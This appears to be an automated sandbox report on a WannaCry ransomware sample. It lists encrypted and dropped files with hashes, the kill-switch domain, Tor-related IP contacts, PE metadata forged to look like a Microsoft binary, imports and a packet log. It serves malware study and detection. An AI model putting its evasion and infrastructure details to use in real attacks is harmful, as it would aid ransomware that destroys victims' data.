  • SHA-512: 0C6E91DC28AD3F4D8B99CAAA91A962C4DA815EC2E797B7B78B9AF577B75449866531C22ECD15BDD94E539C3765227066E00961888F9D189941AF6EF726F431D4
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js.WNCRY (copy)
  • Type:
  • MD5: DEC1F8722527F6B1AC6851AAA5E72A6C
  • SHA: BB25486112DE3D3D283F6972A3341108DBA00636
  • SHA-256: 9B2B94F5D36F469A9C410FD602218F2726FAEDFDD1C1B25894A18C671D890EDD
  • SHA-512: 93FC5E83CC4CF22536DD69C8FD611F889C28A4050DEE821D943DDF0A2F02E79B186F926C78EDAF66FE467E2DDA7D11B495A006ED725EB22BBA0C1A84716D6EFE
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
true
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore.js.WNCRY (copy)
  • Type:
  • MD5: 5EEFBE80139B6090BA1184B84C316698
  • SHA: 634E9FFE9DF3E1A51AD42B0734DBD913541DD7D7
  • SHA-256: 85253E565EE73B9CBB1AF982E0F7FC84A817FF1E20DF774D6874668D08288CB4
  • SHA-512: C1F70B5F146C185482C29BB5273750ACB648D335FE156F2716DBA84BAA6B0E067F0438902E1B256CA5DB7B10E5FE7A2C5A6BC9D0153028B9533A451BF0FD1D90
false
C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore.js.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
true
C:\Users\luketaylor\Desktop\@WanaDecryptor@.bmp
  • Type: PC bitmap, Windows 3.x format, 800 x 600 x 24
  • MD5: C17170262312F3BE7027BC2CA825BF0C
  • SHA: F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
  • SHA-256: D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
  • SHA-512: C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
false
C:\Users\luketaylor\Desktop\@WanaDecryptor@.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • MD5: 7BF2B57F2A205768755C07F238FB32CC
  • SHA: 45356A9DD616ED7161A3B9192E2F318D0AB5AD10
  • SHA-256: B9C5D4339809E0AD9A00D4D3DD26FDF44A32819A54ABF846BB9B560D81391C25
  • SHA-512: 91A39E919296CB5C6ECCBA710B780519D90035175AA460EC6DBE631324E5E5753BD8D87F395B5481BCD7E1AD623B31A34382D81FAAE06BEF60EC28B49C3122A9
true
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs (copy)
  • Type:
  • MD5: C28E9FDA3321FC4ABE53BC8C0436B58E
  • SHA: 8866549BBA2C1C3CAFB38E98850F7D13EF36F14B
  • SHA-256: 77BB2B9AAA3C019E77553E432E375D28FBA659E1512A5A66CDBEE8144C3E1644
  • SHA-512: 0C14BC97E091B03F5DAF0E741EC8C9A6A9B1DE23B2C87509815FBEF636AE3924DEB27CA1C06A7F1B7566C636D69831BB66553C4E354BC1E59E9AC1E091498270
false
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp
  • Type: ASCII text, with CRLF line terminators
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
true
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus (copy)
  • Type:
  • MD5: 9C5AB9C71E636E2A6BDD859C772921D2
  • SHA: 6B854D63D37C3EA19ACA3F376F79AA86CB7D9DF1
  • SHA-256: 03A1A3860262222B94454892F00F362E26375D987E3FA64D47D29160422D053A
  • SHA-512: D83E830E4FE7D4563A80CB215E37BEA5AD635B194543FB50ED1B8E58D59D5C52BC0A8143458C819C128D11B0F78700CFDDC19BB96F75CA25067FE51522D3B4B8
false
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp
  • Type: ASCII text, with CRLF line terminators
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
true
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new
  • Type: ASCII text, with very long lines
  • MD5: A4C46BB56BDDA00A012700662648531C
  • SHA: EB9E7710BA3CC0E7B7DB3B753BEED61CFDE6E942
  • SHA-256: BD54C8D27E0CE376294B3A6B98BDC9D7AC42A3CCB6463C4C5D02F5B97C0028F3
  • SHA-512: 9803EDA391138227D11440AB96CAE3F47471590B21D89B9D19C9B16F66F955E47B744E294C0F3B15428F78F012C4ECB7F099A506BC6D3D0709483A9815423962
true
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state (copy)
  • Type:
  • MD5: D63FF4A3187552088BE7B17BB6FB7962
  • SHA: 691AD4423BC897557AB2F2B4B4459C691D7D8F4E
  • SHA-256: 066509CBDE3991C2387A66FCB5AE7E56999500CF17B936718D84C12F18560569
  • SHA-512: F72E99BB273875EB4C79FEB5710C6E40AA8EFF3E3576A5C1BB256CC1E2B5983910CC3063C875DB3756AA91FC9DF928533E0A4D6AAD2482F3BFA112135C8AFCB3
false
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp
  • Type: ASCII text, with CRLF line terminators
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
true
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus (copy)
  • Type:
  • MD5: 9C5AB9C71E636E2A6BDD859C772921D2
  • SHA: 6B854D63D37C3EA19ACA3F376F79AA86CB7D9DF1
  • SHA-256: 03A1A3860262222B94454892F00F362E26375D987E3FA64D47D29160422D053A
  • SHA-512: D83E830E4FE7D4563A80CB215E37BEA5AD635B194543FB50ED1B8E58D59D5C52BC0A8143458C819C128D11B0F78700CFDDC19BB96F75CA25067FE51522D3B4B8
false
C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp
  • Type: ASCII text, with CRLF line terminators
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
true
C:\Windows\Temp\hibsys.WNCRYT
  • Type: VISX image file
  • MD5: FF4559A280520A0119474FD7AD68396C
  • SHA: 520FCCFF975E532367B1481E251A4BCDCA1C9939
  • SHA-256: A2D61D856A5B2B42A7623FA8A0BCF78C385D4D2B6AA6E8D543917D395F10FD20
  • SHA-512: 3C25CA986CA73BA0DCEA770F21945CB6EC4C027531890BA24EB87ED263C44F9ED05E763CF9ED9AC46D6494BD05FE1C434E6AFFF17CF1965BDB847C75788E3268
false
C:\Windows\tasksche.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • MD5: 84C82835A5D21BBCF75A61706D8AB549
  • SHA: 5FF465AFAABCBF0150D1A3AB2C2E74F3A4426467
  • SHA-256: ED01EBFBC9EB5BBEA545AF4D01BF5F1071661840480439C6E5BABE8E080E41AA
  • SHA-512: 90723A50C20BA3643D625595FD6BE8DCF88D70FF7F4B4719A88F055D5B3149A4231018EA30D375171507A147E59F73478C0C27948590794554D031E7D54B7244
false
C:\autoexec.bat.WNCRY (copy)
  • Type:
  • MD5: 1FE653A091A9204C62085864C8143316
  • SHA: 22662BC4308EC0FF834EEDC622B2BFA1385B9ECA
  • SHA-256: 72D93C8103927E7BA4631732A97A609D13C4D17595744893E2D4EBE06BDD6EA5
  • SHA-512: B9A49650C715724DF87A09408F1A6C62E701E8339A4B5E4EEC1B2410553CACFC40F274D81E671409FC54BB10C45B6D4F6C81A4CEC28D1D69282F0A7518BAB413
false
C:\autoexec.bat.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMalicious
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com144.217.74.156truefalse

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
95.130.12.119France
2345632bitTransitionASfalse
195.154.107.23France
12876ONLINESAStrue
8.8.8.8United States
15169GoogleIncfalse
79.137.85.71Italy
34695E4Asrltrue
85.235.250.88Denmark
9167WEBPARTNERASisaDanishInternetServiceProviderfalse
131.188.40.189Germany
680VereinzurFoerderungeinesDeutschenForschungsnetzesfalse
144.217.74.156United States
11714UniversityofNebraskaCentralAdministrationfalse
138.68.0.4United States
17007OrbitalSciencesCorporationtrue

Static File Info

General

File type:PE32 executable (GUI) Intel 80386, for MS Windows
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:mssecsvc.exe
File size:3723264
MD5:db349b97c37d22f5ea1d1841e3c89eb4
SHA1:e889544aff85ffaf8b0d0da705105dee7c97fe26
SHA256:24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
SHA512:d6c60b8f22f89cbd1262c0aa7ae240577a82002fb149e9127d4edf775a25abcda4e585b6113e79ab4a24bb65f4280532529c2f06f7ffe4d5db45c0caf74fea38
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U<S..]=..]=..]=.jA1..]=..A3..]=.~B7..]=.~B6..]=.~B9..]=..R`..]=..]<.J]=.'{6..]=..[;..]=.Rich.]=.........................PE..L..

File Icon

Static PE Info

General

Entrypoint:0x409a16
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x4CE78ECC [Sat Nov 20 09:03:08 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:4
OS Version Minor:0
File Version Major:4
File Version Minor:0
Subsystem Version Major:4
Subsystem Version Minor:0
Import Hash:9ecee117164e0b870a53dd187cdd7174

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0040A1A0h
push 00409BA2h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [0040A0C0h]
pop ecx
or dword ptr [0070F894h], FFFFFFFFh
or dword ptr [0070F898h], FFFFFFFFh
call dword ptr [0040A0C8h]
mov ecx, dword ptr [0070F88Ch]
mov dword ptr [eax], ecx
call dword ptr [0040A0CCh]
mov ecx, dword ptr [0070F888h]
mov dword ptr [eax], ecx
mov eax, dword ptr [0040A0E4h]
mov eax, dword ptr [eax]
mov dword ptr [0070F890h], eax
call 00007F4738B49D21h
cmp dword ptr [00431410h], ebx
jne 00007F4738B49C0Eh
push 00409B9Eh
call dword ptr [0040A0D4h]
pop ecx
call 00007F4738B49CF3h
push 0040B010h
push 0040B00Ch
call 00007F4738B49CDEh
mov eax, dword ptr [0070F884h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [0070F880h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0040A0DCh]
push 0040B008h

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0xa1e00xa0.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x3100000x35a454.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0xa0000x188.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeEntropyXored PEZLIB ComplexityFile TypeCharacteristics
.text0x10000x8bca0x9000False0.534450954861data6.13459082812IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0xa0000x9980x1000False0.29345703125data3.50361558618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0xb0000x30489c0x27000IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ0xb000
.rsrc0x3100000x35a4540x35b000IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ0x32000

Resources

NameRVASizeTypeLanguageCountry
R0x3100a40x35a000PE32 executable (GUI) Intel 80386, for MS WindowsEnglishUnited States
RT_VERSION0x66a0a40x3b0dataEnglishUnited States

Imports

DLLImport
KERNEL32.dllWaitForSingleObject, InterlockedIncrement, GetCurrentThreadId, GetCurrentThread, ReadFile, GetFileSize, CreateFileA, MoveFileExA, SizeofResource, TerminateThread, LoadResource, FindResourceA, GetProcAddress, GetModuleHandleW, ExitProcess, GetModuleFileNameA, LocalFree, LocalAlloc, CloseHandle, InterlockedDecrement, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, GlobalAlloc, GlobalFree, QueryPerformanceFrequency, QueryPerformanceCounter, GetTickCount, LockResource, Sleep, GetStartupInfoA, GetModuleHandleA
ADVAPI32.dllStartServiceCtrlDispatcherA, RegisterServiceCtrlHandlerA, ChangeServiceConfig2A, SetServiceStatus, OpenSCManagerA, CreateServiceA, CloseServiceHandle, StartServiceA, CryptGenRandom, CryptAcquireContextA, OpenServiceA
WS2_32.dllclosesocket, recv, send, htonl, ntohl, WSAStartup, inet_ntoa, ioctlsocket, select, htons, socket, connect, inet_addr
MSVCP60.dll??1_Lockit@std@@QAE@XZ, ??0_Lockit@std@@QAE@XZ
iphlpapi.dllGetAdaptersInfo, GetPerAdapterInfo
WININET.dllInternetOpenA, InternetOpenUrlA, InternetCloseHandle
MSVCRT.dll__set_app_type, _stricmp, __p__fmode, __p__commode, _except_handler3, __setusermatherr, _initterm, __getmainargs, _acmdln, _adjust_fdiv, _controlfp, exit, _XcptFilter, _exit, _onexit, __dllonexit, free, ??2@YAPAXI@Z, _ftol, sprintf, _endthreadex, strncpy, rand, _beginthreadex, __CxxFrameHandler, srand, time, __p___argc

Version Infos

DescriptionData
LegalCopyright Microsoft Corporation. All rights reserved.
InternalNamelhdfrgui.exe
FileVersion6.1.7601.17514 (win7sp1_rtm.101119-1850)
CompanyNameMicrosoft Corporation
ProductNameMicrosoft Windows Operating System
ProductVersion6.1.7601.17514
FileDescriptionMicrosoft Disk Defragmenter
OriginalFilenamelhdfrgui.exe
Translation0x0409 0x04b0

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
May 12, 2017 18:53:26.864295959 CEST5327853192.168.1.168.8.8.8
May 12, 2017 18:53:27.081289053 CEST53532788.8.8.8192.168.1.16
May 12, 2017 18:53:27.188632011 CEST4919080192.168.1.16144.217.74.156
May 12, 2017 18:53:30.196316004 CEST4919080192.168.1.16144.217.74.156
May 12, 2017 18:53:36.195943117 CEST4919080192.168.1.16144.217.74.156
May 12, 2017 18:53:48.703721046 CEST6405253192.168.1.168.8.8.8
May 12, 2017 18:53:48.863464117 CEST53640528.8.8.8192.168.1.16
May 12, 2017 18:53:48.880059004 CEST4919180192.168.1.16144.217.74.156
May 12, 2017 18:53:48.880091906 CEST8049191144.217.74.156192.168.1.16
May 12, 2017 18:53:48.880168915 CEST4919180192.168.1.16144.217.74.156
May 12, 2017 18:53:48.880690098 CEST4919180192.168.1.16144.217.74.156
May 12, 2017 18:53:48.880716085 CEST8049191144.217.74.156192.168.1.16
May 12, 2017 18:53:49.145505905 CEST8049191144.217.74.156192.168.1.16
May 12, 2017 18:53:49.145562887 CEST4919180192.168.1.16144.217.74.156
May 12, 2017 18:53:49.383095026 CEST4919180192.168.1.16144.217.74.156
May 12, 2017 18:54:26.832833052 CEST49195443192.168.1.1695.130.12.119
May 12, 2017 18:54:26.832869053 CEST4434919595.130.12.119192.168.1.16
May 12, 2017 18:54:26.832937002 CEST49195443192.168.1.1695.130.12.119
May 12, 2017 18:54:27.009150028 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.009196997 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.009285927 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.052656889 CEST49195443192.168.1.1695.130.12.119
May 12, 2017 18:54:27.052706003 CEST4434919595.130.12.119192.168.1.16
May 12, 2017 18:54:27.053352118 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.053375006 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.140882969 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.144144058 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.144186974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.180291891 CEST4434919595.130.12.119192.168.1.16
May 12, 2017 18:54:27.184706926 CEST49195443192.168.1.1695.130.12.119
May 12, 2017 18:54:27.184761047 CEST4434919595.130.12.119192.168.1.16
May 12, 2017 18:54:27.221338034 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.222728014 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.222755909 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.266028881 CEST4434919595.130.12.119192.168.1.16
May 12, 2017 18:54:27.266774893 CEST49195443192.168.1.1695.130.12.119
May 12, 2017 18:54:27.266813993 CEST4434919595.130.12.119192.168.1.16
May 12, 2017 18:54:27.338284016 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.338316917 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.338491917 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.339977026 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.340006113 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.376200914 CEST4434919595.130.12.119192.168.1.16
May 12, 2017 18:54:27.376218081 CEST4434919595.130.12.119192.168.1.16
May 12, 2017 18:54:27.376363039 CEST49195443192.168.1.1695.130.12.119
May 12, 2017 18:54:27.377805948 CEST49195443192.168.1.1695.130.12.119
May 12, 2017 18:54:27.377856970 CEST4434919595.130.12.119192.168.1.16
May 12, 2017 18:54:27.405255079 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.406056881 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.406089067 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.472347975 CEST4434919595.130.12.119192.168.1.16
May 12, 2017 18:54:27.490097046 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.490113020 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.490122080 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.490289927 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.491866112 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.491888046 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.491898060 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.492669106 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.500122070 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.500138044 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.500147104 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.500293970 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.500917912 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.500955105 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.500969887 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.501070976 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.518771887 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.518800974 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.518815994 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.518867970 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.519325972 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.519354105 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.519366980 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.519447088 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.528582096 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.528613091 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.528640985 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.528717995 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.528742075 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.544181108 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.544204950 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.544331074 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.544358969 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.544888973 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.544917107 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.546654940 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.546679020 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.546684980 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.546752930 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.553467035 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.553488970 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.553494930 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.553695917 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.562750101 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.562763929 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.562768936 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.562956095 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.567023039 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.567035913 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.567054987 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.567159891 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.575182915 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.575207949 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.575217009 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.575331926 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.576134920 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.576163054 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.576173067 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.576286077 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.576715946 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.585305929 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.585331917 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.585345030 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.585439920 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.585509062 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.585525990 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.585534096 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.585592985 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.603904963 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.603931904 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.603941917 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.603954077 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.603960991 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.604084015 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.604099035 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.604125023 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.604132891 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.604149103 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.604545116 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.604760885 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.621680021 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.621701002 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.621711969 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.621795893 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.629302979 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.629318953 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.629342079 CEST44349196131.188.40.189192.168.1.16
May 12, 2017 18:54:27.629987955 CEST49196443192.168.1.16131.188.40.189
May 12, 2017 18:54:27.630176067 CEST49196443192.168.1.16131.188.40.189
